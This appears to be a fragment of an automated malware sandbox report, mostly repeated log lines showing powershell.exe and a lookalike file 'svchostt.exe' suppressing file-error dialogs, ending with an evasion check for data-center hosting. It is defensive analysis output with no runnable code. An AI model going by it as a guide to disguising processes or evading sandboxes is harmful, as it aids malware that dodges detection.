                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\svchostt.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      barindex
                      Check if machine is in data center or colocation facility
